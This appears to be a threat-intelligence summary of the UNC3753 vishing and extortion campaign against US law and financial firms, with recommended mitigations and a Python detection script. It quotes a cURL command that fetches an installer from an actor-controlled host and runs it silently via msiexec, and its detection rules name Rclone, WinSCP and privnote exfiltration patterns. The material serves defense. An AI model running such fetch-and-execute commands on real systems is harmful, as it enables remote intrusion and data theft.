"This is not a joke or a scam." — line from a sample extortion email Mandiant observed, attributed to the group tracked as UNC3753.
UNC3753: vishing, rapid intrusions, and extortion
From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign carried out by the threat cluster UNC3753 targeting dozens of organizations across professional, legal, and financial services in the United States. The group uses voice phishing (vishing) and social engineering to gain remote access, often completing the full attack sequence — initial contact through data theft and extortion — within a single business day. In some cases Mandiant observed searches, staging, and theft initiated in under an hour.
Tools abused: RMM, screen-sharing, Privnote and cURL staging
UNC3753 relies on human deception to bypass technical controls. Actors call employees — sometimes using contact details publicly listed on corporate websites — and pose as internal IT or security staff to persuade targets to join screen-sharing sessions or install remote monitoring and management (RMM) utilities. The campaign makes repeated use of legitimate commercial utilities including Zoom, Microsoft Teams, Microsoft Terminal Services, Quick Assist, and RMM software such as AnyDesk, Bomgar, Zoho Assist, and SuperOps RMM.
To avoid leaving persistent artifacts, the actors transmit installation links and commands using privnote[.]com, a self‑destructing text service. Mandiant recorded a staging example where a cURL command pulled an installer and executed an MSI via msiexec: curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
Data staging and exfiltration: OneDrive, iManage, WinSCP and Rclone
Once inside, the actors map directories, enumerate OneDrive folders and mapped drives, and use keyword searches inside document systems such as iManage to locate tax forms (W‑2, W‑9, 1099), audit files, client agreements, and Social Security numbers. Staged results are often placed in Downloads folders or Roaming profile paths.
Exfiltration is equally opportunistic: portable WinSCP or Rclone binaries are used where allowed; actors also upload files directly through the victim’s browser into actor-controlled consumer cloud storage accounts, sometimes creating folders renamed to mimic the victim organization. In one case Mandiant observed 1.7 GB exfiltrated from a local OneDrive to Google Drive, and an additional 14.4 GB taken using WinSCP. Google has disabled Drive accounts and assets tied to this activity.
Physical access escalation: onsite technician ruse and the FBI Cyber FLASH
Although UNC3753 primarily deploys remote social engineering, GTIG notes an escalation to physical tactics. The FBI’s Cyber FLASH Alert corroborates instances where actors, failing to secure remote footholds, sent individuals to victims’ offices who posed as technicians and attempted to image devices or copy data to USB drives. GTIG assesses these physical intrusions are likely associated with UNC3753 based on overlaps in structure, timeline, and targets, though some incidents lacked forensic evidence or subsequent extortion to enable formal attribution.
Mitigations recommended by GTIG and Mandiant
Mandiant and GTIG offer concrete controls to blunt this campaign’s human-focused approach. Key recommendations include:
- User education tailored to UNC3753 tactics and vishing scenarios.
- Physical access verification: require photo IDs, log visitor IDs, pre-scheduled work orders, and mandatory escorts for technical personnel.
- Conditional access: restrict VDI and VPN authentication to corporate-owned devices and require MFA step‑up for BYOD VDI access.
- Application control and RMM restrictions: block unauthorized installers and enforce Windows Defender Application Control or equivalent policies.
- Disable write/read capabilities for external USB mass storage via GPOs or MDM, and restrict removable and optical media on BYOD systems accessing VDI.
- Network monitoring: alert on outbound connections to unauthorized file‑sharing APIs, monitor SSH (port 22) for high‑volume WinSCP/Rclone transfers, and enable firewall session logging with byte counts.
- Audit and alerting in document stores (iManage, SharePoint) for bulk searches and mass downloads; enforce MFA on critical repositories.
What this means for technologists, policymakers, and law firms
- Technologists and security teams: prioritize detection for behavior patterns named in Mandiant’s findings (privnote usage, cURL‑launched MSI installers, high‑volume Rclone/WinSCP transfers, mass iManage searches) and enforce application control and conditional access for VDIs and BYOD.
- Policymakers and regulators: the extortion letters explicitly reference potential "substantial regulatory fines" and reputational harm, underscoring why regulatory compliance and incident notification procedures will be focal points for affected organizations.
- Affected law firms and professional services firms: assume attackers may be able to reach clients and partners quickly — UNC3753 threatens to call and email external clients within days — and harden both technical repositories and front‑office physical procedures (visitor verification, escorted access) accordingly.
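The detection patterns named above (cURL-launched MSI installers, privnote links, Rclone/WinSCP run from user-writable paths, and high-volume port 22 egress from the network-monitoring recommendation) can be expressed as a small rule set over endpoint and firewall telemetry. The following is an added illustration, not code from Mandiant or GTIG; the event records, hostnames, 192.0.2.x/198.51.100.x addresses and the 1 GB threshold are constructed assumptions.

```python
import re

# Constructed sample telemetry (not from the report): process-creation
# events and firewall session records with outbound byte counts.
PROCESS_EVENTS = [
    {"host": "ws-042", "user": "jdoe",
     "cmd": 'curl -sL "http://192.0.2.10/installer" -o "SuperOps.msi" '
            '&& msiexec /i "SuperOps.msi" /quiet'},
    {"host": "ws-042", "user": "jdoe", "cmd": "msedge.exe https://privnote.com/note123"},
    {"host": "ws-017", "user": "jdoe",
     "cmd": r"C:\Users\jdoe\Downloads\rclone.exe copy C:\Users\jdoe\OneDrive gdrive:acme"},
    {"host": "ws-099", "user": "asmith", "cmd": "notepad.exe report.txt"},
]
FLOW_EVENTS = [
    {"host": "ws-017", "dst": "198.51.100.7", "dport": 22, "bytes_out": 15_400_000_000},
    {"host": "ws-099", "dst": "198.51.100.9", "dport": 443, "bytes_out": 120_000},
]

# Each rule is (name, regex over the full command line), case-insensitive.
PROCESS_RULES = [
    ("curl_msi_msiexec", re.compile(r"\b(curl|wget)\b.*\.msi.*\bmsiexec\b", re.I)),
    ("privnote_url", re.compile(r"privnote\.com", re.I)),
    ("transfer_tool_from_user_path",
     re.compile(r"\\(Downloads|AppData\\Roaming)\\[^ ]*(rclone|winscp)[^ ]*\.exe", re.I)),
]
SSH_BYTES_THRESHOLD = 1_000_000_000  # assumed: >1 GB to port 22 in one session is abnormal

def match_process(event):
    """Return the names of every process rule the command line triggers."""
    return [name for name, rx in PROCESS_RULES if rx.search(event["cmd"])]

def match_flow(event, threshold=SSH_BYTES_THRESHOLD):
    """True when a session pushed more than `threshold` bytes to port 22."""
    return event["dport"] == 22 and event["bytes_out"] > threshold

def run(process_events, flow_events):
    """Produce (host, rule) alerts from both telemetry sources."""
    alerts = []
    for ev in process_events:
        alerts += [(ev["host"], r) for r in match_process(ev)]
    for ev in flow_events:
        if match_flow(ev):
            alerts.append((ev["host"], "high_volume_ssh_egress"))
    return alerts

def correlated(alerts):
    """Hosts with both a staging rule and the egress rule: triage these first."""
    by_host = {}
    for host, rule in alerts:
        by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in by_host.items()
                  if "high_volume_ssh_egress" in rules and len(rules) > 1)

if __name__ == "__main__":
    found = run(PROCESS_EVENTS, FLOW_EVENTS)
    for host, rule in found:
        print(f"{host}: {rule}")
    print("escalate:", correlated(found))
```

The regexes are deliberately narrow; in production, pair the command-line rules with parent-process context (a browser or Teams/Zoom session spawning curl or msiexec) to cut false positives from legitimate software deployment.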
UNC3753’s playbook is straightforward but effective: weaponize trust, abuse legitimate remote tools, and move fast. The addition of in‑person attempts to copy data turns administrative lapses into high‑value failure modes. Organizations that combine strict physical verification, application whitelisting, conditional VDI controls, and focused detection for the specific artifacts Mandiant describes will be better positioned to blunt an adversary that prizes speed and social engineering over sophisticated malware.
Source: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/